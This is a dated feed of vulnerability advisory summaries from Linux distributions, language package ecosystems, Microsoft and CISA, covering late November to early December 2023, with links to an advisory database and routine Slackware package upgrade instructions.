25.11.2023 02:00:00gentoo[GLSA-202311-06] multipath-tools: Multiple Vulnerabilities (high)Multiple vulnerabilities have been discovered in multipath-tools, the worst of which can lead to root privilege escalation.https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202311-06
25.11.2023 02:00:00gentoo[GLSA-202311-13] Apptainer: Privilege Escalation (high)A privilege escalation vulnerability has been discovered in Apptainer.https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202311-13
25.11.2023 02:00:00gentoo[GLSA-202311-14] GRUB: Multiple Vulnerabilities (high)Multiple vulnerabilities have been discovered in GRUB, which may lead to secure boot circumvention or code execution.https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202311-14
25.11.2023 02:00:00gentoo[GLSA-202311-07] AIDE: Root Privilege Escalation (high)A vulnerability has been found in AIDE which can lead to root privilege escalation.https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202311-07
25.11.2023 02:00:00gentoo[GLSA-202311-08] GNU Libmicrohttpd: Buffer Overflow Vulnerability (high)A buffer overflow vulnerability has been discovered in GNU Libmicrohttpd.https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202311-08
25.11.2023 02:00:00gentoo[GLSA-202311-09] Go: Multiple Vulnerabilities (high)Multiple vulnerabilities have been discovered in Go, the worst of which could lead to remote code execution.https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202311-09
25.11.2023 02:00:00gentoo[GLSA-202311-10] RenderDoc: Multiple Vulnerabilities (high)Multiple vulnerabilities have been discovered in RenderDoc, the worst of which leads to remote code execution.https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202311-10
25.11.2023 02:00:00gentoo[GLSA-202311-11] QtWebEngine: Multiple Vulnerabilities (high)Multiple vulnerabilities have been discovered in QtWebEngine, the worst of which could lead to remote code execution.https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202311-11
25.11.2023 02:00:00gentoo[GLSA-202311-12] MiniDLNA: Multiple Vulnerabilities (high)Multiple vulnerabilities have been discovered in MiniDLNA, the worst of which could lead to remove code execution.https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202311-12
26.11.2023 02:00:00gentoo[GLSA-202311-16] Open vSwitch: Multiple Vulnerabilities (low)Multiple denial of service vulnerabilites have been found in Open vSwitch.https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202311-16
26.11.2023 02:00:00gentoo[GLSA-202311-15] LibreOffice: Multiple Vulnerabilities (high)Multiple vulnerabilities have been discovered in LibreOffice, the worst of which could lead to code execution.https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202311-15
26.11.2023 02:00:00gentoo[GLSA-202311-17] phpMyAdmin: Multiple Vulnerabilities (low)Multiple vulnerabilities have been discovered in phpMyAdmin, the worst of which allows for denial of service.https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202311-17
26.11.2023 02:00:00gentoo[GLSA-202311-14] GRUB: Multiple Vulnerabilities (high)Multiple vulnerabilities have been discoverd in GRUB, which may lead to secure boot circumvention or code execution.https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202311-14
26.11.2023 14:18:49 | pypi | [PYSEC-2023-243] localstack vulnerability | Missing SSL certificate validation in localstack v2.3.2 allows attackers to eavesdrop on communications between the host and server via a man-in-the-middle attack. | https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-243
27.11.2023 20:11:30 | ubuntu | [USN-6513-2] Python vulnerability | Several security issues were fixed in Python. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6513-2
27.11.2023 17:59:49 | ubuntu | [USN-6402-2] LibTomMath vulnerability | LibTomMath could be made to execute arbitrary code or denial of service if it received a specially crafted input. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6402-2
27.11.2023 16:15:35 | ubuntu | [USN-6517-1] Perl vulnerabilities | Several security issues were fixed in Perl. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6517-1
27.11.2023 16:08:08 | ubuntu | [USN-6502-2] Linux kernel (Oracle) vulnerabilities | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6502-2
27.11.2023 15:41:01 | ubuntu | [USN-6516-1] Linux kernel (Intel IoTG) vulnerabilities | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6516-1
27.11.2023 07:45:20 | ubuntu | [USN-6515-1] Thunderbird vulnerabilities | Several security issues were fixed in Thunderbird. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6515-1
27.11.2023 02:00:00 | gentoo | [GLSA-202311-18] GLib: Multiple Vulnerabilities (high) | Multiple vulnerabilities have been discovered in GLib. | https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202311-18
27.11.2023 01:54:45 | ubuntu | [USN-6514-1] Open vSwitch vulnerability | Open vSwitch could be made to expose sensitive information over the network. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6514-1
28.11.2023 22:17:29 | ubuntu | [USN-6502-3] Linux kernel (NVIDIA) vulnerabilities | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6502-3
28.11.2023 22:01:23 | ubuntu | [USN-6520-1] Linux kernel (StarFive) vulnerabilities | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6520-1
28.11.2023 20:11:57 | ubuntu | [USN-6519-1] EC2 hibagent update | A security improvement was added to EC2 hibagent. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6519-1
28.11.2023 18:24:17 | ubuntu | [USN-6518-1] AFFLIB vulnerability | AFFLIB could be made to crash if it opened a specially crafted file. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6518-1
28.11.2023 15:11:44 | ubuntu | [USN-6508-2] poppler regression | USN-6508-1 caused some minor regressions in poppler. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6508-2
28.11.2023 16:17:30 | rustsec | [RUSTSEC-2023-0072] `openssl` `X509StoreRef::objects` is unsound | This function returned a reference into an OpenSSL data structure, but there was no way to ensure OpenSSL would not mutate the data structure behind one's back. Use of this function should be replaced with `X509StoreRef::all_certificates`. | https://secdb.nttzen.cloud/security-advisory/detail/RUSTSEC-2023-0072
28.11.2023 19:40:54 | rustsec | [RUSTSEC-2023-0071] Marvin Attack: potential key recovery through timing sidechannels | Impact: Due to a non-constant-time implementation, information about the private key is leaked through timing information which is observable over the network. An attacker may be able to use that information to recover the key. Patches: No patch is yet available, however work is underway to migrate to a fully constant-time implementation. Workarounds: The only currently available workaround is to avoid using the `rsa` crate in settings where attackers are able to observe timing information, e.g. local use on a non-compromised computer is fine. References: This vulnerability was discovered as part of the "Marvin Attack" (https://people.redhat.com/~hkario/marvin/), which revealed several implementations of RSA including OpenSSL had not properly mitigated timing sidechannel attacks. | https://secdb.nttzen.cloud/security-advisory/detail/RUSTSEC-2023-0071
30.11.2023 01:00:14 | ubuntu | [USN-6528-1] OpenJDK 8 vulnerabilities | Several security issues were fixed in OpenJDK. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6528-1
29.11.2023 23:56:58 | ubuntu | [USN-6527-1] OpenJDK vulnerabilities | Several security issues were fixed in OpenJDK 17, OpenJDK 21, OpenJDK. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6527-1
29.11.2023 20:18:18 | msrc | [MS:CVE-2023-6351] Chromium: CVE-2023-6351 Use after free in libavif | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-6351
29.11.2023 20:18:16 | msrc | [MS:CVE-2023-6350] Chromium: CVE-2023-6350 Out of bounds memory access in libavif | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-6350
29.11.2023 20:18:13 | msrc | [MS:CVE-2023-6348] Chromium: CVE-2023-6348 Type Confusion in Spellcheck | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-6348
29.11.2023 20:18:11 | msrc | [MS:CVE-2023-6347] Chromium: CVE-2023-6347 Use after free in Mojo | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-6347
29.11.2023 20:18:10 | msrc | [MS:CVE-2023-6346] Chromium: CVE-2023-6346 Use after free in WebAudio | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-6346
29.11.2023 20:18:06 | msrc | [MS:CVE-2023-6345] Chromium: CVE-2023-6345 Integer overflow in Skia | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-6345
29.11.2023 19:48:53 | ubuntu | [USN-6526-1] GStreamer Bad Plugins vulnerabilities | Several security issues were fixed in GStreamer Bad Plugins. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6526-1
29.11.2023 19:39:38 | ubuntu | [USN-6519-2] EC2 hibagent update | A security improvement was added to EC2 hibagent. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6519-2
29.11.2023 17:51:58 | ubuntu | [USN-6525-1] pysha3 vulnerability | pysha3 could be made to crash or run programs if it received specially crafted data. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6525-1
29.11.2023 17:46:37 | ubuntu | [USN-6524-1] PyPy vulnerability | PyPy could be made to crash or run programs if it received specially crafted data. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6524-1
29.11.2023 15:41:02 | ubuntu | [USN-6523-1] u-boot-nezha vulnerability | Several security issues were fixed in u-boot-nezha. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6523-1
29.11.2023 15:34:38 | ubuntu | [USN-6522-1] FreeRDP vulnerabilities | Several security issues were fixed in FreeRDP. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6522-1
29.11.2023 15:17:06 | ubuntu | [USN-6521-1] GIMP vulnerabilities | GIMP could be made to crash or run programs as your login if it opened a specially crafted file. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6521-1
29.11.2023 20:14:14 | pypi | [PYSEC-2023-243] localstack vulnerability | Missing SSL certificate validation in localstack v2.3.2 allows attackers to eavesdrop on communications between the host and server via a man-in-the-middle attack. | https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-243
30.11.2023 23:22:23 | slackware | [SSA:2023-334-01] samba | New samba packages are available for Slackware 15.0 and -current to fix a security issue. **Here are the details from the Slackware 15.0 ChangeLog** ```patches/packages/samba-4.18.9-i586-1_slack15.0.txz: Upgraded. This is a security release in order to address the following defect: An information leak vulnerability was discovered in Samba's LDAP server. Due to missing access control checks, an authenticated but unprivileged attacker could discover the names and preserved attributes of deleted objects in the LDAP store. Upgrading to this package will not prevent this information leak - if you are using Samba as an Active Directory Domain Controller, you will need to follow the instructions in the samba.org link given below. For more information, see: https://www.samba.org/samba/security/CVE-2018-14628.html https://www.cve.org/CVERecord?id=CVE-2018-14628 (* Security fix *)``` **Where to find the new packages** Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 15.0: ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/samba-4.18.9-i586-1_slack15.0.txz Updated package for Slackware x86_64 15.0: ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/samba-4.18.9-x86_64-1_slack15.0.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/samba-4.19.3-i586-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/samba-4.19.3-x86_64-1.txz **MD5 signatures** Slackware 15.0 package: f73bf7dc7dc0ac254840a236d609bda2 samba-4.18.9-i586-1_slack15.0.txz Slackware x86_64 15.0 package: 152b8d8fcc261ae89effaf5181b54243 samba-4.18.9-x86_64-1_slack15.0.txz Slackware -current package: f9874a7129f05b59febd0c85a61488c3 n/samba-4.19.3-i586-1.txz Slackware x86_64 -current package: e91fa8957a4400c3218f309a22a2e8eb n/samba-4.19.3-x86_64-1.txz **Installation instructions** Upgrade the package as root: `# upgradepkg samba-4.18.9-i586-1_slack15.0.txz` If you are concerned about the information leak, please follow the additional instructions found at this link: https://www.samba.org/samba/security/CVE-2018-14628.html | https://secdb.nttzen.cloud/security-advisory/detail/SSA:2023-334-01
30.11.2023 19:56:50 | ubuntu | [USN-6494-2] Linux kernel vulnerabilities | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6494-2
30.11.2023 19:38:29 | ubuntu | [USN-6495-2] Linux kernel vulnerabilities | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6495-2
30.11.2023 19:24:11 | ubuntu | [USN-6496-2] Linux kernel vulnerabilities | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6496-2
30.11.2023 18:56:33 | ubuntu | [USN-6502-4] Linux kernel vulnerabilities | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6502-4
30.11.2023 22:29:51 | rubysec | [RUBYSEC:CARRIERWAVE-2023-49090] CarrierWave Content-Type allowlist bypass vulnerability, possibly leading to XSS (medium) | Impact: [CarrierWave::Uploader::ContentTypeAllowlist](https://github.com/carrierwaveuploader/carrierwave/blob/master/lib/carrierwave/uploader/content_type_allowlist.rb) has a Content-Type allowlist bypass vulnerability, possibly leading to XSS. The validation in `allowlisted_content_type?` determines Content-Type permissions by performing a partial match. If the `content_type` argument of `allowlisted_content_type?` is passed a value crafted by the attacker, Content-Types not included in the `content_type_allowlist` will be allowed. In addition, by setting the Content-Type configured by the attacker at the time of file delivery, it is possible to cause XSS on the user's browser when the uploaded file is opened. Patches: Upgrade to [3.0.5](https://rubygems.org/gems/carrierwave/versions/3.0.5) or [2.2.5](https://rubygems.org/gems/carrierwave/versions/2.2.5). Workarounds: When validating with `allowlisted_content_type?` in [CarrierWave::Uploader::ContentTypeAllowlist](https://github.com/carrierwaveuploader/carrierwave/blob/master/lib/carrierwave/uploader/content_type_allowlist.rb), forward match (`\A`) the Content-Type set in `content_type_allowlist`, preventing unintentional permission of `text/html;image/png` when you want to allow only `image/png` in `content_type_allowlist`. References: [OWASP - File Upload Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html#content-type-validation) | https://secdb.nttzen.cloud/security-advisory/detail/RUBYSEC:CARRIERWAVE-2023-49090
01.12.2023 18:57:31 | suse | [SUSE-SU-2023:4634-1] Security update for ImageMagick (important) | Security update for ImageMagick | https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4634-1
01.12.2023 15:37:06 | suse | [SUSE-SU-2023:4631-1] Security update for python-Pillow (important) | Security update for python-Pillow | https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4631-1
01.12.2023 15:36:58 | suse | [SUSE-SU-2023:4630-1] Security update for python-Pillow (important) | Security update for python-Pillow | https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4630-1
01.12.2023 10:26:08 | suse | [SUSE-SU-2023:4625-1] Security update for containerd, docker, runc (important) | Security update for containerd, docker, runc | https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4625-1
02.12.2023 19:00:59 | opensuse | [openSUSE-SU-2023:0388-1] Security update for optipng (moderate) | Security update for optipng | https://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2023:0388-1
04.12.2023 20:07:01 | ubuntu | [USN-6529-1] Request Tracker vulnerabilities | Several security issues were fixed in Request Tracker. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6529-1
04.12.2023 04:22:47 | ubuntu | [USN-6509-2] Firefox regressions | USN-6509-1 caused some minor regressions in Firefox. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6509-2
04.12.2023 18:37:59 | almalinux | [ALSA-2023:7581] postgresql:13 security update (important) | postgresql:13 security update | https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7581
04.12.2023 03:02:18 | almalinux | [ALSA-2023:7549] kernel security and bug fix update (important) | kernel security and bug fix update | https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7549
06.12.2023 01:21:49 | ubuntu | [USN-6534-1] Linux kernel vulnerabilities | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6534-1
05.12.2023 23:59:34 | ubuntu | [USN-6533-1] Linux kernel (OEM) vulnerabilities | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6533-1
05.12.2023 23:13:46 | ubuntu | [USN-6532-1] Linux kernel vulnerabilities | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6532-1
05.12.2023 18:35:31 | ubuntu | [USN-6531-1] Redis vulnerabilities | Several security issues were fixed in Redis. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6531-1
05.12.2023 15:12:31 | ubuntu | [USN-6530-1] HAProxy vulnerability | HAProxy could be made to expose sensitive information. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6530-1
05.12.2023 02:00:00 | cisa | [CISA-2023:1205] CISA Adds 4 Known Exploited Vulnerabilities to Catalog | CISA has added 4 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise. | https://secdb.nttzen.cloud/security-advisory/detail/CISA-2023:1205
06.12.2023 17:22:41 | ubuntu | [USN-6539-1] python-cryptography vulnerabilities | Several security issues were fixed in python-cryptography. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6539-1
06.12.2023 17:11:27 | ubuntu | [USN-6538-1] PostgreSQL vulnerabilities | Several security issues were fixed in PostgreSQL. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6538-1
06.12.2023 15:55:09 | ubuntu | [USN-6537-1] Linux kernel (GCP) vulnerabilities | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6537-1
06.12.2023 15:34:15 | ubuntu | [USN-6536-1] Linux kernel vulnerabilities | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6536-1
06.12.2023 14:11:58 | ubuntu | [USN-6535-1] curl vulnerabilities | Several security issues were fixed in curl. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6535-1
06.12.2023 11:43:32 | ubuntu | [USN-6463-2] Open VM Tools vulnerabilities | Several security issues were fixed in Open VM Tools. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6463-2
06.12.2023 09:15:41 | alpinelinux | [ALPINE:CVE-2023-2861] qemu vulnerability | [From CVE-2023-2861] A flaw was found in the 9p passthrough filesystem (9pfs) implementation in QEMU. The 9pfs server did not prohibit opening special files on the host side, potentially allowing a malicious client to escape from the exported 9p tree by creating and opening a device file in the shared folder. | https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-2861
08.12.2023 23:15:07 | alpinelinux | [ALPINE:CVE-2023-34320] xen vulnerability | [From CVE-2023-34320] Cortex-A77 cores (r0p0 and r1p0) are affected by erratum 1508412 where software, under certain circumstances, could deadlock a core due to the execution of either a load to device or non-cacheable memory, and either a store exclusive or register read of the Physical Address Register (PAR_EL1) in close proximity. | https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-34320
07.12.2023 20:59:06 | msrc | [MS:CVE-2023-6512] Chromium: CVE-2023-6512 Inappropriate implementation in Web Browser UI | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-6512
07.12.2023 20:59:04 | msrc | [MS:CVE-2023-6511] Chromium: CVE-2023-6511 Inappropriate implementation in Autofill | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-6511
07.12.2023 20:59:02 | msrc | [MS:CVE-2023-6510] Chromium: CVE-2023-6510 Use after free in Media Capture | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-6510
07.12.2023 20:59:00 | msrc | [MS:CVE-2023-6509] Chromium: CVE-2023-6509 Use after free in Side Panel Search | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-6509
07.12.2023 20:58:56 | msrc | [MS:CVE-2023-6508] Chromium: CVE-2023-6508 Use after free in Media Stream | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-6508
07.12.2023 19:50:46 | ubuntu | [USN-6542-1] TinyXML vulnerability | TinyXML could be made to crash if it opened a specially crafted file. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6542-1
07.12.2023 18:32:37 | suse | [SUSE-SU-2023:4693-1] Security update for kubevirt, virt-api-container, virt-controller-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container (important) | Security update for kubevirt, virt-api-container, virt-controller-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container | https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4693-1
07.12.2023 18:24:50 | ubuntu | [USN-6541-1] GNU C Library vulnerabilities | Several security issues were fixed in GNU C Library. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6541-1
07.12.2023 13:00:10 | ubuntu | [USN-6522-2] FreeRDP vulnerabilities | Several security issues were fixed in FreeRDP. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6522-2
07.12.2023 12:41:45 | suse | [SUSE-SU-2023:4690-1] Security update for poppler (moderate) | Security update for poppler | https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4690-1
07.12.2023 11:01:17 | opensuse | [openSUSE-SU-2023:0391-1] Security update for libtorrent-rasterbar, qbittorrent (moderate) | Security update for libtorrent-rasterbar, qbittorrent | https://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2023:0391-1
07.12.2023 10:49:38 | suse | [SUSE-SU-2023:4689-1] Security update for cdi-apiserver-container, cdi-cloner-container, cdi-controller-container, cdi-importer-container, cdi-operator-container, cdi-uploadproxy-container, cdi-uploadserver-container, containerized-data-importer (important) | Security update for cdi-apiserver-container, cdi-cloner-container, cdi-controller-container, cdi-importer-container, cdi-operator-container, cdi-uploadproxy-container, cdi-uploadserver-container, containerized-data-importer | https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4689-1
07.12.2023 10:00:00 | msrc | [MS:CVE-2023-35618] Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability (moderate) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35618
07.12.2023 10:00:00 | msrc | [MS:CVE-2023-38174] Microsoft Edge (Chromium-based) Information Disclosure Vulnerability (low) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-38174
07.12.2023 10:00:00 | msrc | [MS:CVE-2023-36880] Microsoft Edge (Chromium-based) Information Disclosure Vulnerability (low) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36880
07.12.2023 07:15:09 | alpinelinux | [ALPINE:CVE-2023-41913] strongswan vulnerability | [From CVE-2023-41913] strongSwan before 5.9.12 has a buffer overflow and possible unauthenticated remote code execution via a DH public value that exceeds the internal buffer in charon-tkm's DH proxy. The earliest affected version is 5.3.0. An attack can occur via a crafted IKE_SA_INIT message. | https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-41913
07.12.2023 06:07:20 | ubuntu | [USN-6540-1] BlueZ vulnerability | BlueZ could be made to give a physically proximate attacker keyboard and mouse control of a computer. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6540-1
07.12.2023 03:15:07 | alpinelinux | [ALPINE:CVE-2023-46218] curl vulnerability | [From CVE-2023-46218] This flaw allows a malicious HTTP server to set "super cookies" in curl that are then passed back to more origins than what is otherwise allowed or possible. This allows a site to set cookies that then would get sent to different and unrelated sites and domains. It could do this by exploiting a mixed case flaw in curl's function that verifies a given cookie domain against the Public Suffix List (PSL). For example a cookie could be set with `domain=co.UK` when the URL used a lowercase hostname `curl.co.uk`, even though `co.uk` is listed as a PSL domain. | https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-46218
06.12.2023 19:15:07 | alpinelinux | [ALPINE:CVE-2023-39326] go vulnerability | [From CVE-2023-39326] A malicious HTTP sender can use chunk extensions to cause a receiver reading from a request or response body to read many more bytes from the network than are in the body. A malicious HTTP client can further exploit this to cause a server to automatically read a large amount of data (up to about 1GiB) when a handler fails to read the entire body of a request. Chunk extensions are a little-used HTTP feature which permit including additional metadata in a request or response body sent using the chunked encoding. The net/http chunked encoding reader discards this metadata. A sender can exploit this by inserting a large metadata segment with each byte transferred. The chunk reader now produces an error if the ratio of real body to encoded bytes grows too small. | https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-39326
07.12.2023 16:01:08 | rubysec | [RUBYSEC:PUBNUB-2023-26154] pubnub Insufficient Entropy vulnerability (medium) | Versions of the package pubnub before 7.4.0; all versions of the package com.pubnub:pubnub; versions of the package pubnub before 6.19.0; all versions of the package github.com/pubnub/go; versions of the package github.com/pubnub/go/v7 before 7.2.0; versions of the package pubnub before 7.3.0; versions of the package pubnub/pubnub before 6.1.0; versions of the package pubnub before 5.3.0; versions of the package pubnub before 0.4.0; versions of the package pubnub/c-core before 4.5.0; versions of the package com.pubnub:pubnub-kotlin before 7.7.0; versions of the package pubnub/swift before 6.2.0; versions of the package pubnub before 5.2.0; versions of the package pubnub before 4.3.0 are vulnerable to Insufficient Entropy via the getKey function, due to inefficient implementation of the AES-256-CBC cryptographic algorithm. The provided encrypt function is less secure when hex encoding and trimming are applied, leaving half of the bits in the key always the same for every encoded message or file. **Note:** In order to exploit this vulnerability, the attacker needs to invest resources in preparing the attack and brute-force the encryption. | https://secdb.nttzen.cloud/security-advisory/detail/RUBYSEC:PUBNUB-2023-26154
10.12.2023 03:15:09 | slackware | [SSA:2023-343-01] libxml2 | New libxml2 packages are available for Slackware 14.0, 14.1, 14.2, 15.0, and -current to fix security issues. **Here are the details from the Slackware 15.0 ChangeLog** ```patches/packages/libxml2-2.12.2-i586-1_slack15.0.txz: Upgraded. Add --sysconfdir=/etc option so that this can find the xml catalog. Thanks to SpiderTux. Fix the following security issues: Fix integer overflows with XML_PARSE_HUGE. Fix dict corruption caused by entity reference cycles. Hashing of empty dict strings isn't deterministic. Fix null deref in xmlSchemaFixupComplexType. For more information, see: https://www.cve.org/CVERecord?id=CVE-2022-40303 https://www.cve.org/CVERecord?id=CVE-2022-40304 https://www.cve.org/CVERecord?id=CVE-2023-29469 https://www.cve.org/CVERecord?id=CVE-2023-28484 (* Security fix *)``` **Where to find the new packages** Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/libxml2-2.12.2-i486-1_slack14.0.txz Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/libxml2-2.12.2-x86_64-1_slack14.0.txz Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/libxml2-2.12.2-i486-1_slack14.1.txz Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/libxml2-2.12.2-x86_64-1_slack14.1.txz Updated package for Slackware 14.2: ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/libxml2-2.12.2-i586-1_slack14.2.txz Updated package for Slackware x86_64 14.2: ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/libxml2-2.12.2-x86_64-1_slack14.2.txz Updated package for Slackware 15.0: ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/libxml2-2.12.2-i586-1_slack15.0.txz Updated package for Slackware x86_64 15.0: ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/libxml2-2.12.2-x86_64-1_slack15.0.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libxml2-2.12.2-i586-2.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libxml2-2.12.2-x86_64-2.txz **MD5 signatures** Slackware 14.0 package: 781670f0524d4980ef7b48876fc07b35 libxml2-2.12.2-i486-1_slack14.0.txz Slackware x86_64 14.0 package: 6e5084f495e8401e097d49bec5d470d0 libxml2-2.12.2-x86_64-1_slack14.0.txz Slackware 14.1 package: 1e3a912ba24a2ee014b239ed03302260 libxml2-2.12.2-i486-1_slack14.1.txz Slackware x86_64 14.1 package: 6e0bbf965cca0038a13f6f5faaac690d libxml2-2.12.2-x86_64-1_slack14.1.txz Slackware 14.2 package: 7f11d69e862d4d42407bf9fbc8b134a8 libxml2-2.12.2-i586-1_slack14.2.txz Slackware x86_64 14.2 package: 8f06b46fdf685dedd2d56400503e80b6 libxml2-2.12.2-x86_64-1_slack14.2.txz Slackware 15.0 package: 936f1e6831a94df80e926e173505ad17 libxml2-2.12.2-i586-1_slack15.0.txz Slackware x86_64 15.0 package: 5691184f8e0b89b5fb4344e9d4b4f732 libxml2-2.12.2-x86_64-1_slack15.0.txz Slackware -current package: bfa544daff81a3f89e44dd9f1f6b997e l/libxml2-2.12.2-i586-2.txz Slackware x86_64 -current package: e866ccd932b516f53cc5cf3c30e1c70a l/libxml2-2.12.2-x86_64-2.txz **Installation instructions** Upgrade the package as root: `# upgradepkg libxml2-2.12.2-i586-1_slack15.0.txz` | https://secdb.nttzen.cloud/security-advisory/detail/SSA:2023-343-01
